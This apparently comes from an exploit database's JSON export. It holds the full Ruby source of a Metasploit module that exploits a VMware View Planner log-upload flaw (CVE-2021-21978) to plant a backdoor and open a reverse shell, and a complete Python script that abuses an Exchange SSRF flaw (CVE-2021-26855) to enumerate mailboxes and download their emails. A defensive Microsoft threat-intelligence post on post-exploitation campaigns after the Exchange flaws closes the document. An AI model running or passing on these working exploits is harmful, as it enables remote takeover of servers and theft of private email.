"1337DAY-ID-35998", "href": "https://0day.today/exploit/description/35998", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware View Planner Unauthenticated Log File Upload RCE',\n 'Description' => %q{\n This module exploits an unauthenticated log file upload within the\n log_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6\n Security 
Patch 1.\n\n Successful exploitation will result in RCE as the apache user inside\n the appacheServer Docker container.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'wvu', # Analysis and PoC\n 'Grant Willcox' # Metasploit Module\n ],\n 'References' => [\n ['CVE', '2021-21978'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0003.html'],\n ['URL', 'https://attackerkb.com/assessments/fc456e03-adf5-409a-955a-8a4fb7e79ece'] # wvu's PoC\n ],\n 'DisclosureDate' => '2021-03-02', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Privileged' => false,\n 'Platform' => 'python',\n 'Targets' => [\n [\n 'VMware View Planner 4.6.0',\n {\n 'Arch' => ARCH_PYTHON,\n 'Type' => :linux_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'python/meterpreter/reverse_tcp'\n }\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'wsgi_log_upload', 'log_upload_wsgi.py')\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n unless res.code == 200 && !res.body.empty?\n return CheckCode::Safe('log_upload_wsgi.py file not found at the expected location.')\n end\n\n @original_content = res.body # If the server responded with the contents of log_upload_wsgi.py, lets save this for later restoration.\n\n if res.body&.include?('import hashlib') && res.body&.include?('if hashlib.sha256(password.value.encode(\"utf8\")).hexdigest()==secret_key:')\n return CheckCode::Safe(\"Target's log_upload_wsgi.py file has been patched.\")\n end\n\n CheckCode::Appears('Vulnerable log_upload_wsgi.py file identified!')\n end\n\n # We need to upload a file twice: once 
for uploading the backdoor, and once for restoring the original file.\n # As the code for both is the same, minus the content of the file, this is a generic function to handle that.\n def upload_file(content)\n mime = Rex::MIME::Message.new\n mime.add_part(content, 'application/octet-stream', nil, \"form-data; name=\\\"logfile\\\"; filename=\\\"#{Rex::Text.rand_text_alpha(20)}\\\"\")\n mime.add_part('{\"itrLogPath\":\"/etc/httpd/html/wsgi_log_upload\",\"logFileType\":\"log_upload_wsgi.py\"}', nil, nil, 'form-data; name=\"logMetaData\"')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'logupload'),\n 'ctype' => \"multipart/form-data; boundary=#{mime.bound}\",\n 'data' => mime.to_s\n )\n unless res.to_s.include?('File uploaded successfully.')\n fail_with(Failure::UnexpectedReply, \"Target indicated that the file wasn't uploaded successfully!\")\n end\n end\n\n def exploit\n # Here we want to grab our template file, taken from a clean install but\n # with a backdoor section added to it, and then fill in the PAYLOAD placeholder\n # with the payload we want to execute.\n data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname)\n file_content = File.read(File.join(data_dir, 'log_upload_wsgi.py'))\n\n payload.encoded.gsub!(/\"/, '\\\\\"')\n file_content['PAYLOAD'] = payload.encoded\n\n # Now that things are primed, upload the file to the target.\n print_status('Uploading backdoor to system via the arbitrary file upload vulnerability!')\n upload_file(file_content)\n print_good('Backdoor uploaded!')\n\n # Use the OPTIONS request to trigger the backdoor. 
Technically this\n # could be any other method including invalid ones like BACKDOOR, but for\n # the purposes of stealth lets use a legitimate one.\n print_status('Sending request to execute the backdoor!')\n send_request_cgi(\n 'method' => 'OPTIONS',\n 'uri' => normalize_uri(target_uri.path, 'logupload')\n )\n ensure\n # At this point we should have our shell after waiting a few seconds,\n # so lets now restore the original file so we don't leave anything behind.\n print_status('Reuploading the original code to remove the backdoor!')\n upload_file(@original_content)\n print_good('Original file restored, enjoy the shell!')\n end\nend\n", "sourceHref": "https://0day.today/exploit/35998", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-08T14:23:56", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-18T00:00:00", "type": "zdt", "title": "Microsoft Exchange 2019 - Unauthenticated Email Download Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-05-18T00:00:00", "id": "1337DAY-ID-36262", "href": 
"https://0day.today/exploit/description/36262", "sourceData": "# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download\n# Exploit Author: Gonzalo Villegas a.k.a Cl34r\n# Vendor Homepage: https://www.microsoft.com/\n# Version: OWA Exchange 2013 - 2019\n# Tested on: OWA 2016\n# CVE : CVE-2021-26855\n# Details: checking users mailboxes and automated downloads of emails\n\nimport requests\nimport argparse\nimport time\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n__proxies__ = {\"http\": \"http://127.0.0.1:8080\",\n \"https\": \"https://127.0.0.1:8080\"} # for debug on proxy\n\n\n# needs to specifies mailbox, will return folder Id if account exists\npayload_get_folder_id = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetFolder>\n <m:FolderShape>\n <t:BaseShape>AllProperties</t:BaseShape>\n </m:FolderShape>\n <m:FolderIds>\n <t:DistinguishedFolderId Id=\"inbox\">\n <t:Mailbox>\n <t:EmailAddress>{}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:FolderIds>\n </m:GetFolder>\n </soap:Body>\n </soap:Envelope>\n\n\"\"\"\n# needs to specifies Folder Id and ChangeKey, will return a list of messages Ids (emails)\npayload_get_items_id_folder = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:FindItem Traversal=\"Shallow\">\n <m:ItemShape>\n 
<BaseShape>AllProperties</BaseShape></m:ItemShape>\n <SortOrder/>\n <m:ParentFolderIds>\n <t:FolderId Id=\"{}\" ChangeKey=\"{}\"/>\n </m:ParentFolderIds>\n <QueryString/>\n </m:FindItem>\n </soap:Body>\n</soap:Envelope>\n\"\"\"\n\n# needs to specifies Id (message Id) and ChangeKey (of message too), will return an email from mailbox\npayload_get_mail = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <GetItem xmlns=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" Traversal=\"Shallow\">\n <ItemShape>\n <t:BaseShape>Default</t:BaseShape>\n </ItemShape>\n <ItemIds>\n <t:ItemId Id=\"{}\" ChangeKey=\"{}\"/>\n </ItemIds>\n </GetItem>\n </soap:Body>\n </soap:Envelope>\n\"\"\"\n\n\ndef getFQDN(url):\n print(\"[*] Getting FQDN from headers\")\n rs = requests.post(url + \"/owa/auth.owa\", verify=False, data=\"evildata\")\n if \"X-FEServer\" in rs.headers:\n return rs.headers[\"X-FEServer\"]\n else:\n print(\"[-] Can't get FQDN \")\n exit(0)\n\n\ndef extractEmail(url, uri, user, fqdn, content_folderid, path):\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\n \"Content-Type\": \"text/xml\",\n \"User-Agent\": \"Mozilla pwner\"}\n from xml.etree import ElementTree as ET\n dom = ET.fromstring(content_folderid)\n for p in dom.findall('.//{http://schemas.microsoft.com/exchange/services/2006/types}Folder'):\n id_folder = p[0].attrib.get(\"Id\")\n change_key_folder = p[0].attrib.get(\"ChangeKey\")\n data = payload_get_items_id_folder.format(id_folder, change_key_folder)\n random_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"]\n rs = 
requests.post(url + uri, data=data, headers=headers, verify=False)\n if \"ErrorAccessDenied\" in rs.text:\n print(\"[*] Denied ;(.. retrying\")\n t_uri = uri.split(\"/\")[-1]\n for ru in random_uris:\n print(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru)))\n rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)\n if \"NoError\" in rs.text:\n print(\"[+] data found, dowloading email\")\n break\n print(\"[+]Getting mails...\")\n dom_messages = ET.fromstring(rs.text)\n messages = dom_messages.find('.//{http://schemas.microsoft.com/exchange/services/2006/types}Items')\n for m in messages:\n id_message = m[0].attrib.get(\"Id\")\n change_key_message = m[0].attrib.get(\"ChangeKey\")\n data = payload_get_mail.format(id_message, change_key_message)\n random_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"]\n rs = requests.post(url + uri, data=data, headers=headers, verify=False)\n if \"ErrorAccessDenied\" in rs.text:\n print(\"[*] Denied ;(.. retrying\")\n t_uri = uri.split(\"/\")[-1]\n for ru in random_uris:\n print(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru)))\n rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)\n if \"NoError\" in rs.text:\n print(\"[+] data found, downloading email\")\n break\n\n try:\n f = open(path + \"/\" + user.replace(\"@\", \"_\").replace(\".\", \"_\")+\"_\"+change_key_message.replace(\"/\", \"\").replace(\"\\\\\", \"\")+\".xml\", 'w+')\n f.write(rs.text)\n f.close()\n except Exception as e:\n print(\"[!] 
Can't write .xml file to path (email): \", e)\n\n\ndef checkURI(url, fqdn):\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\n \"Content-Type\": \"text/xml\",\n \"User-Agent\": \"Mozilla hehe\"}\n arr_uri = [\"//ecp/xxx.js\", \"/ecp/favicon.ico\", \"/ecp/auth.js\"]\n for uri in arr_uri:\n rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(\"[email\u00a0protected]\"),\n headers=headers)\n #print(rs.content)\n if rs.status_code == 200 and \"MessageText\" in rs.text:\n print(\"[+] Valid URI:\", uri)\n calculated_domain = rs.headers[\"X-CalculatedBETarget\"].split(\".\")\n if calculated_domain[-2] in (\"com\", \"gov\", \"gob\", \"edu\", \"org\"):\n calculated_domain = calculated_domain[-3] + \".\" + calculated_domain[-2] + \".\" + calculated_domain[-1]\n else:\n calculated_domain = calculated_domain[-2] + \".\" + calculated_domain[-1]\n return uri, calculated_domain\n #time.sleep(1)\n print(\"[-] No valid URI found ;(\")\n exit(0)\n\n\ndef checkEmailBoxes(url, uri, user, fqdn, path):\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\n \"Content-Type\": \"text/xml\",\n \"User-Agent\": \"Mozilla hehe\"}\n rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(user),\n headers=headers)\n #time.sleep(1)\n #print(rs.content)\n if \"ResponseCode\" in rs.text and \"ErrorAccessDenied\" in rs.text:\n print(\"[*] Valid Email: {} ...but not authenticated ;( maybe not vulnerable\".format(user))\n if \"ResponseCode\" in rs.text and \"NoError\" in rs.text:\n print(\"[+] Valid Email Found!: {}\".format(user))\n extractEmail(url, uri, user, fqdn, rs.text, path)\n if \"ResponseCode\" in rs.text and \"ErrorNonExistentMailbox\" in rs.text:\n print(\"[-] Not Valid Email: {}\".format(user))\n\n\ndef main():\n __URL__ = None\n __FQDN__ = None\n __mailbox_domain__ = None\n __path__ = None\n print(\"[***** OhhWAA *****]\")\n parser = 
argparse.ArgumentParser(usage=\"Basic usage python %(prog)s -u <url> -l <users.txt> -p <path>\")\n parser.add_argument('-u', \"--url\", help=\"Url, provide schema and not final / (eg https://example.org)\", required=True)\n parser.add_argument('-l', \"--list\", help=\"Users mailbox list\", required=True)\n parser.add_argument(\"-p\", \"--path\", help=\"Path to write emails in xml format\", required=True)\n parser.add_argument('-f', \"--fqdn\", help=\"FQDN\", required=False, default=None)\n parser.add_argument(\"-d\", \"--domain\", help=\"Domain to check mailboxes (eg if .local dont work)\", required=False, default=None)\n args = parser.parse_args()\n __URL__ = args.url\n __FQDN__ = args.fqdn\n __mailbox_domain__ = args.domain\n __list_users__ = args.list\n __valid_users__ = []\n __path__ = args.path\n if not __FQDN__:\n __FQDN__ = getFQDN(__URL__)\n print(\"[+] Got FQDN:\", __FQDN__)\n\n valid_uri, calculated_domain = checkURI(__URL__, __FQDN__)\n\n if not __mailbox_domain__:\n __mailbox_domain__ = calculated_domain\n\n list_users = open(__list_users__, \"r\")\n for user in list_users:\n checkEmailBoxes(__URL__, valid_uri, user.strip()+\"@\"+__mailbox_domain__, __FQDN__, __path__)\n\n print(\"[!!!] FINISHED OhhWAA\")\n\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/36262", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2021-03-26T05:16:59", "description": "Microsoft continues to monitor and investigate attacks exploiting the recent on-premises Exchange Server vulnerabilities. These attacks are now performed by multiple threat actors ranging from financially motivated cybercriminals to state-sponsored groups. 
To help customers who are not able to immediately install updates, Microsoft [released a one-click tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) that automatically mitigates one of the vulnerabilities and scans servers for known attacks. Microsoft also [built this capability into Microsoft Defender Antivirus](<https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/>), expanding the reach of the mitigation. As of today, we have seen a significant decrease in the number of still-vulnerable servers \u2013 more than 92% of known worldwide Exchange IPs are now patched or mitigated. We continue to work with our customers and partners to mitigate the vulnerabilities.\n\nAs organizations recover from this incident, we continue to publish guidance and share threat intelligence to help detect and evict threat actors from affected environments. Today, we are sharing intelligence about what some attackers did after exploiting the vulnerable servers, ranging from ransomware to data exfiltration and deployment of various second-stage payloads. 
This blog covers:\n\n * Threat intelligence and technical details about known attacks, including components and attack paths, that defenders can use to investigate whether on-premises Exchange servers were compromised before they were patched and to comprehensively respond to and remediate these threats if they see them in their environments.\n * Detection and automatic remediation built into Microsoft Defender Antivirus and how investigation and remediation capabilities in solutions like Microsoft Defender for Endpoint can help responders perform additional hunting and remediate threats.\n\nAlthough the overall numbers of ransomware have remained extremely small to this point, it is important to remember that these threats show how quickly attackers can pivot their campaigns to take advantage of newly disclosed vulnerabilities and target unpatched systems, demonstrating how critical it is for organizations to apply security updates as soon as possible. We strongly urge organizations to identify and update vulnerable on-premises Exchange servers, and to follow mitigation and investigation guidance that we have collected and continue to update here: <https://aka.ms/ExchangeVulns>.\n\n## Mitigating post-exploitation activities\n\nThe first known attacks leveraging the Exchange Server vulnerabilities were by the nation-state actor HAFNIUM, which we detailed in [this blog](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). In the three weeks after the Exchange server vulnerabilities were disclosed and the security updates were released, Microsoft saw numerous other attackers adopting the exploit into their toolkits. Attackers are known to rapidly work to reverse engineer patches and develop exploits. 
In the case of a remote code execution (RCE) vulnerability, the rewards are high for attackers who can gain access before an organization patches, as patching a system does not necessarily remove the access of the attacker.\n\n\n\n_Figure 1. The Exchange Server exploit chain_\n\nIn our investigation of the on-premises Exchange Server attacks, we saw systems being affected by multiple threats. **Many of the compromised systems have not yet received a secondary action**, such as human-operated ransomware attacks or data exfiltration, indicating attackers could be establishing and keeping their access for potential later actions. These actions might involve performing follow-on attacks via persistence on Exchange servers they have already compromised, or using credentials and data stolen during these attacks to compromise networks through other entry vectors.\n\nAttackers who included the exploit in their toolkits, whether through modifying public proof-of-concept exploits or their own research, capitalized on their window of opportunity to gain access to as many systems as they could. Some attackers were advanced enough to remove other attackers from the systems and use multiple persistence points to maintain access to a network.\n\nWe have built protections against these threats into Microsoft security solutions. Refer to the Appendix for a list of indicators of compromise, detection details, and advanced hunting queries. We have also provided additional tools and investigation and remediation guidance here: <https://aka.ms/exchange-customer-guidance>.\n\nWhile performing a full investigation on systems is recommended, the following themes are common in many of the attacks. These are prevailing threat trends that Microsoft has been monitoring, and existing solutions and recommendations for prevention and mitigation apply:\n\n * Web shells - As of this writing, many of the unpatched systems we observed had multiple web shells on them. 
Microsoft has been tracking the rise of web shell attacks for the past few years, ensuring our products detect these threats and providing remediation guidance for customers. For more info on web shells, read [Web shell attacks continue to rise](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>). We have also published guidance on [web shell threat hunting with Azure Sentinel](<http://aka.ms/exchange-web-shell-investigation>).\n * Human-operated ransomware - Ransomware attacks pose some of the biggest security risks for organizations today, and attackers behind these attacks were quick to take advantage of the on-premises Exchange Server vulnerabilities. Successfully exploiting the vulnerabilities gives attackers the ability to launch human-operated ransomware campaigns, a trend that Microsoft has been closely monitoring. For more information about human-operated ransomware attacks, including Microsoft solutions and guidance for improving defenses, read: [Human-operated ransomware attacks](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n * Credential theft \u2013 While credential theft is not the immediate goal of some of these attacks, access to Exchange servers allowed attackers to access and potentially steal credentials present on the system. Attackers can use these stolen credentials for follow-on attacks later, so organizations need to prioritize identifying and remediating impacted identities. For more information, read best practices for building credential hygiene.\n\nIn the following sections, we share our analysis of known post-compromise activities associated with exploitation of the Exchange server vulnerabilities because it is helpful to understand these TTPs, in order to defend against other actors using similar tactics or tools. 
While levels of disruptive post-compromise activity like ransomware may be limited at the time of this writing, Microsoft will continue to track this space and share information with the community. It\u2019s important to note that with some post-compromise techniques, attackers may gain highly privileged persistent access, but **many of the impactful subsequent attacker activities can be mitigated by practicing the principle of least privilege and mitigating lateral movement**.\n\n## DoejoCrypt ransomware\n\nDoejoCrypt was the first ransomware to appear to take advantage of the vulnerabilities, starting to encrypt in limited numbers shortly after the patches were released. Ransomware attackers often use multiple tools and exploits to gain initial access, including purchasing access through a broker or \u201creseller\u201d who sells access to systems they have already compromised. The DoejoCrypt attacks start with a variant of the Chopper web shell being deployed to the Exchange server post-exploitation.\n\nThe web shell writes a batch file to _C:\\Windows\\Temp\\xx.bat_. Found on all systems that received the DoejoCrypt ransomware payload, this batch file performs a backup of the Security Account Manager (SAM) database and the System and Security registry hives, allowing the attackers later access to passwords of local users on the system and, more critically, in the LSA Secrets portion of the registry, where passwords for services and scheduled tasks are stored.\n\n\n\n_Figure 2. xx.bat_\n\nGiven configurations that administrators typically use on Exchange servers, many of the compromised systems are likely to have had at least one service or scheduled task configured with a highly privileged account to perform actions like backups. 
**As service account credentials are not frequently changed, this could provide a great advantage to an attacker even if they lose their initial web shell access due to an antivirus detection**, as the account can be used to elevate privileges later, which is why we strongly recommend operating under the principle of least privileged access.\n\nThe batch file saves the registry hives to a semi-unique location, _C:\\windows\\temp\\debugsms_, assembles them into a CAB file for exfiltration, and then cleans up the folders from the system. The file also enables Windows Remote Management and sets up an HTTP listener, indicating the attacker might take advantage of the internet-facing nature of an Exchange Server and use this method for later access if other tools are removed.\n\n\n\n_Figure 3. xx.bat actions_\n\nThe _xx.bat_ file has been run on many more systems than have been ransomed by the DoejoCrypt attacker, meaning that, while not all systems have moved to the ransom stage, the attacker has gained access to multiple credentials. On systems where the attacker moved to the ransom stage, we saw reconnaissance commands being run via the same web shell that dropped the _xx.bat_ file (in this instance, a version of Chopper):\n\n\n\n_Figure 4. DoejoCrypt recon command_\n\nAfter these commands are completed, the web shell drops a new payload to _C:\\Windows\\Help_ which, like in many human-operated ransomware campaigns, leads to the attack framework Cobalt Strike. In observed instances, the downloaded payload is shellcode with the file name _new443.exe_ or _Direct_Load.exe_. When run, this payload injects itself into _notepad.exe_ and reaches out to a C2 to download Cobalt Strike shellcode.\n\n\n\n_Figure 5. DoejoCrypt ransomware attack chain_\n\nDuring the hands-on-keyboard stage of the attack, a new payload is downloaded to _C:\\Windows\\Help_ with names like _s1.exe_ and _s2.exe_. 
This payload is the DoejoCrypt ransomware, which uses a _.CRYPT_ extension for the newly encrypted files and a very basic _readme.txt_ ransom note. In some instances, the time between _xx.bat_ being dropped and a ransomware payload running was under half an hour.\n\n\n\n_Figure 6. DoejoCrypt ransom note_\n\nWhile the DoejoCrypt payload is the most visible outcome of the attackers\u2019 actions, the access to credentials they have gained could serve them for future campaigns if organizations do not reset credentials on compromised systems. An additional overlapping activity observed on systems where _xx.bat_ was present and the attackers were able to get Domain Administrator rights was the running of scripts to snapshot Active Directory with _ntdsutil_\u2014an action that, if executed successfully, could give the attackers access to all the passwords in Active Directory from a single compromised system.\n\n## Lemon Duck botnet\n\nCryptocurrency miners were some of the first payloads we observed being dropped by attackers from the post-exploit web shells. In the first few days after the security updates were released, we observed multiple cryptocurrency miner campaigns, which had been previously targeting SharePoint servers, add Exchange Server exploitation to their repertoire. Most of these coin miners were variations on XMRig miners, and many arrived via a multi-featured implant with the capability to download new payloads or even move laterally.\n\nLemon Duck, a known cryptocurrency botnet named for a variable in its code, dove into the Exchange exploit action, adopting different exploit styles and choosing to use a fileless/web shell-less option of direct PowerShell commands from w3wp (the IIS worker process) for some attacks. 
While still maintaining their normal email-based campaigns, the Lemon Duck operators compromised numerous Exchange servers and moved in the direction of being more of a malware loader than a simple miner.\n\nUsing a form of the attack that allows direct execution of commands versus dropping a web shell, the Lemon Duck operators ran standard Invoke-Expression commands to download a payload. Having used the same C2 and download servers for some time, the operators applied a varied degree of obfuscation to their commands on execution.\n\n\n\n_Figure 7. Example executions of Lemon Duck payload downloads_\n\nThe Lemon Duck payload is an encoded and obfuscated PowerShell script. It first removes various security products from the system, then creates scheduled tasks and a WMI event subscription for persistence. A second script is downloaded to attempt to evade Microsoft Defender Antivirus, abusing the operators' administrative access to run the _Set-MpPreference_ command to disable real-time monitoring (a tactic that Microsoft Defender [Tamper protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) blocks) and add scanning exclusions for the C:\\ drive and the PowerShell process.\n\n\n\n\n\n_Figure 8. Lemon Duck payloads_\n\nOne randomly named scheduled task connects to a C2 every hour to download a new payload, which includes various lateral movement and credential theft tools. The operators were seen to download RATs and information stealers, including [Ramnit](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Ramnit>) payloads.\n\n\n\n_Figure 9. Lemon Duck post-exploitation activities_\n\nIn some instances, the operators took advantage of having compromised mail servers to access mailboxes and send emails containing the Lemon Duck payload using various colorful email subjects.\n\n\n\n_Figure 10. 
Email subjects of possibly malicious emails_\n\n\n\n_Figure 11. Attachment variables_\n\nIn one notable example, the Lemon Duck operators compromised a system that already had _xx.bat_ and a web shell. After establishing persistence on the system in a non-web shell method, the Lemon Duck operators were observed cleaning up other attackers\u2019 presence on the system and mitigating the CVE-2021-26855 (SSRF) vulnerability using a legitimate cleanup script that they hosted on their own malicious server. This action prevents further exploitation of the server and removes web shells, giving Lemon Duck exclusive access to the compromised server. This stresses the need to fully investigate systems that were exposed, even if they have been fully patched and mitigated, per traditional incident response process.\n\n## Pydomer ransomware\n\nWhile DoejoCrypt was a new ransomware payload, the access gained by attackers via the on-premises Exchange Server vulnerabilities will likely become part of the complex cybercriminal economy where additional ransomware operators and affiliates take advantage of it. The first existing ransomware family to capitalize on the vulnerabilities was Pydomer. This ransomware family was previously seen using vulnerabilities in attacks, notably taking advantage of Pulse Secure VPN vulnerabilities, for which Pulse Secure has released security patches, to steal credentials and perform ransomware attacks.\n\nIn this campaign, the operators scanned and mass-compromised unpatched Exchange Servers to drop a web shell. They started later than some other attackers, with many compromises occurring between March 18 and March 20, a window when fewer unpatched systems were available. They then dropped a web shell, with a notable file name format: \u201cChack[Word][Country abbreviation]\u201d:\n\n\n\n_Figure 12. 
Example web shell names observed being used by the Pydomer attackers_\n\nThese web shells were observed on around 1,500 systems, not all of which moved to the ransomware stage. The attackers then used their web shell to dump a _test.bat_ batch file that performed a similar function in the attack chain to the _xx.bat_ of the DoejoCrypt operators and allowed them to perform a dump of the LSASS process.\n\n\n\n_Figure 13. Pydomer post-exploitation activities_\n\nThis access alone would be valuable to attackers for later attacks, similar to the credentials gained during their use of Pulse Secure VPN vulnerabilities. The highly privileged credentials gained from an Exchange system are likely to contain domain administrator accounts and service accounts with backup privileges, meaning these attackers could perform ransomware and exfiltration actions against the networks they compromised long after the Exchange Server is patched and even enter via different means.\n\nOn systems where the attackers did move to second-stage ransomware operations, they utilized a Python script compiled to an executable and the Python cryptography libraries to encrypt files. The attackers then executed a PowerShell script via their web shell that acts as a downloader and distribution mechanism for the ransomware.\n\n\n\n_Figure 14. PowerShell downloader and spreader used to get the Pydomer payload_\n\nThe script fetches a payload from a site hosted on a domain generation algorithm (DGA) domain and attempts to spread it throughout the network, first over WMI using Invoke-WMIMethod to connect to other systems, and falling back to PowerShell remoting with Enter-PSSession if that fails. 
The script is run within the context of the web shell, which in most instances is Local System, so this lateral movement strategy is unlikely to work except in organizations that are running highly insecure and unrecommended configurations like having computer objects in highly privileged groups.\n\nThe Pydomer ransomware is a Python script compiled to an executable and uses the Python cryptography libraries to encrypt files. The ransomware encrypts the files and appends a random extension, and then drops a ransom note named _decrypt_file.TxT_.\n\n\n\n_Figure 15. Pydomer ransom note_\n\nInterestingly, the attackers seem to have deployed a non-encryption extortion strategy. Following well-known ransomware groups like Maze and Egregor, which leaked data for pay, the Pydomer hackers dropped an alternative _readme.txt_ onto systems without encrypting files. This option might have been semi-automated on their part or a side effect of a failure in their encryption process, as some of the systems they accessed were test systems that showed no data exfiltration. The note should be taken seriously if encountered, as the attackers had full access to systems and were likely able to exfiltrate data.\n\n\n\n_Figure 16. Pydomer extortion readme.txt_\n\n## Credential theft, turf wars, and dogged persistence\n\nIf a server is not running in a least-privilege configuration, credential theft could provide a significant return on investment for an attacker beyond their initial access to email and data. Many organizations have backup agent software and scheduled tasks running on these systems with domain admin-level permissions. 
For these organizations, the attackers might be able to harvest highly privileged credentials without lateral movement, for example, using the COM services DLL as a living-off-the-land binary to perform a dump of the LSASS process:\n\n\n\n_Figure 17. Use of COM services DLL to dump LSASS process_\n\nThe number of observed credential theft attacks, combined with the high privilege of accounts often given to Exchange servers, means that these attacks could continue to impact organizations that don\u2019t fully remediate after a compromise even after patches have been applied. While the observed ransomware attempts were small-scale or had errors, there is still the possibility of [more skillful groups](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) utilizing credentials gained in these attacks for later attacks.\n\nAttackers also used their access to perform extensive reconnaissance using built-in Exchange cmdlets and _dsquery_ to exfiltrate information about network configurations, user information, and email assets.\n\nWhile Lemon Duck operators might have had the boldest method for removing other attackers from the systems they compromised, they were not the only attacker to do so. Others were observed cleaning up .aspx and .bat files to remove other attackers, and even rebuilding the WMI database by deleting .mof files and restarting the service. As the window on unpatched machines closes, attackers showed increased interest in maintaining access to the systems they exploited. 
